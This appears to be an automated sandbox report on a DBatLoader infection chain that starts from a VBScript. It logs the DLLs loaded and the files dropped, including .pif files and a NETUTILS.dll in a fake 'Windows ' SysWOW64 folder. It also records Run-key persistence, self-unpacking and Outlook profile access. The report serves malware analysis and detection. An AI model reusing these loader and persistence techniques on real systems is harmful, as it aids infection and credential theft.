            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: vsstrace.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: spp.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: vssapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: vsstrace.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: endpointdlp.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: endpointdlp.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: endpointdlp.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: endpointdlp.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: advapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: advapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: advapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: advapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: advapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: advapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: advapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: spp.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: vssapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: vsstrace.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppwmi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: slc.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppc.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppcext.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppc.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: winscard.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: devobj.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppc.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppc.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: wldp.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: amsi.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: userenv.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: profapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: version.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: rasman.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: secur32.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: schannel.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: version.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: uxtheme.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: url.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ieframe.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: iertutil.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: netapi32.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: userenv.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: winhttp.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: wkscli.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: netutils.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: windows.storage.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: wldp.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: kernel.appcore.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: propsys.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: amsi.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: smartscreenps.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: winmm.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: wininet.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sspicli.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: profapi.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: mswsock.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ieproxy.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ieproxy.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: iphlpapi.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ieproxy.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: mssip32.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: mssip32.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: mssip32.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: winnsi.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppc.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dll
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\Public\Libraries\liuuazhU.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: INQUIRY LIST 292.vbsStatic file information: File size 1139043 > 1048576
            Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000001.00000003.1825875616.000000007F62F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: easinvoker.pdb source: x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1825651514.000000007F650000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.00000000204BF000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.1.dr
            Source: Binary string: _.pdb source: liuuazhU.pif, 00000006.00000002.3110746880.000000001E421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000003.1856725712.000000001B37A000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3108782055.000000001CFF6000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109265688.000000001D3A0000.00000004.08000000.00040000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3118421537.000000002BD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp, liuuazhU.pif, 0000000B.00000003.1986218044.0000000028CFF000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3109591892.000000001C560000.00000004.08000000.00040000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3109192607.000000001C136000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3111207326.000000001D7F1000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000003.2056284697.000000001A55C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000001.00000003.1848292254.0000000021462000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000003.1848292254.0000000021491000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1825651514.000000007F650000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.00000000204BF000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.1.dr

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\Public\Libraries\liuuazhU.pifUnpacked PE file: 6.2.liuuazhU.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
            Source: C:\Users\Public\Libraries\liuuazhU.pifUnpacked PE file: 11.2.liuuazhU.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
            Source: C:\Users\Public\Libraries\liuuazhU.pifUnpacked PE file: 17.2.liuuazhU.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\Public\Libraries\liuuazhU.pifUnpacked PE file: 6.2.liuuazhU.pif.400000.1.unpack
            Source: C:\Users\Public\Libraries\liuuazhU.pifUnpacked PE file: 11.2.liuuazhU.pif.400000.2.unpack
            Source: C:\Users\Public\Libraries\liuuazhU.pifUnpacked PE file: 17.2.liuuazhU.pif.400000.0.unpack
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\x.exe");
            Yara detected DBatLoader
            Source: Yara matchFile source: 1.2.x.exe.27d0000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000003.1799207040.000000007FCB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: liuuazhU.pif.1.drStatic PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E8818 LoadLibraryW,GetProcAddress,FreeLibrary,1_2_027E8818
            Source: initial sampleStatic PE information: section where entry point is pointing to: .
            Source: x.exe.0.drStatic PE information: real checksum: 0x0 should be: 0xdc457
            Source: NETUTILS.dll.1.drStatic PE information: real checksum: 0x273f3 should be: 0x26a85
            Source: Uhzauuil.PIF.1.drStatic PE information: real checksum: 0x0 should be: 0xdc457
            Source: svchost.pif.1.drStatic PE information: section name: .imrsiv
            Source: svchost.pif.1.drStatic PE information: section name: .didat
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Source: NETUTILS.dll.1.drStatic PE information: section name: /4
            Source: NETUTILS.dll.1.drStatic PE information: section name: /19
            Source: NETUTILS.dll.1.drStatic PE information: section name: /31
            Source: NETUTILS.dll.1.drStatic PE information: section name: /45
            Source: NETUTILS.dll.1.drStatic PE information: section name: /57
            Source: NETUTILS.dll.1.drStatic PE information: section name: /70
            Source: NETUTILS.dll.1.drStatic PE information: section name: /81
            Source: NETUTILS.dll.1.drStatic PE information: section name: /92
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027FD2FC push 027FD367h; ret 1_2_027FD35F
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027DC349 push 8B027DC1h; ret 1_2_027DC34E
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027D332C push eax; ret 1_2_027D3368
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027EF3FC push ecx; mov dword ptr [esp], edx1_2_027EF401
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027D63B0 push 027D640Bh; ret 1_2_027D6403
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027D63AE push 027D640Bh; ret 1_2_027D6403
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E306C push 027E30B9h; ret 1_2_027E30B1
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E306B push 027E30B9h; ret 1_2_027E30B1
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027FD0AC push 027FD125h; ret 1_2_027FD11D
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027FD144 push 027FD1ECh; ret 1_2_027FD1E4
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027FD1F8 push 027FD288h; ret 1_2_027FD280
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027FC770 push 027FC76Eh; ret 1_2_027FC766
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E8738 push 027E877Ah; ret 1_2_027E8772
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027D6784 push 027D67C6h; ret 1_2_027D67BE
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027D6782 push 027D67C6h; ret 1_2_027D67BE
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027DC56C push ecx; mov dword ptr [esp], edx1_2_027DC571
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027FC550 push 027FC76Eh; ret 1_2_027FC766
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027DD5A0 push 027DD5CCh; ret 1_2_027DD5C4
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027DCA4F push 027DCD72h; ret 1_2_027DCD6A
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027DCBEC push 027DCD72h; ret 1_2_027DCD6A
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E6948 push 027E69F3h; ret 1_2_027E69EB
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E6946 push 027E69F3h; ret 1_2_027E69EB
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E790C push 027E7989h; ret 1_2_027E7981
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027EA998 push 027EA9D0h; ret 1_2_027EA9C8
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027EA997 push 027EA9D0h; ret 1_2_027EA9C8
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E8990 push 027E89C8h; ret 1_2_027E89C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E898E push 027E89C8h; ret 1_2_027E89C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E5E7C push ecx; mov dword ptr [esp], edx1_2_027E5E7E
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E2F60 push 027E2FD6h; ret 1_2_027E2FCE
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_0041C40C push cs; iretd 6_2_0041C4E2
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_00423149 push eax; ret 6_2_00423179

            Persistence and Installation Behavior

            barindex
            Drops PE files with a suspicious file extension
            Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows \SysWOW64\svchost.pifJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\Uhzauuil.PIFJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\liuuazhU.pifJump to dropped file
            Uses cmd line tools excessively to alter registry or file data
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess created: reg.exe
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess created: reg.exe
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess created: reg.exe
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess created: reg.exeJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess created: reg.exeJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess created: reg.exe
            Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows \SysWOW64\svchost.pifJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\Uhzauuil.PIFJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows \SysWOW64\NETUTILS.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\liuuazhU.pifJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows \SysWOW64\svchost.pifJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows \SysWOW64\NETUTILS.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UhzauuilJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UhzauuilJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027EA9D4 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_027EA9D4
            Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
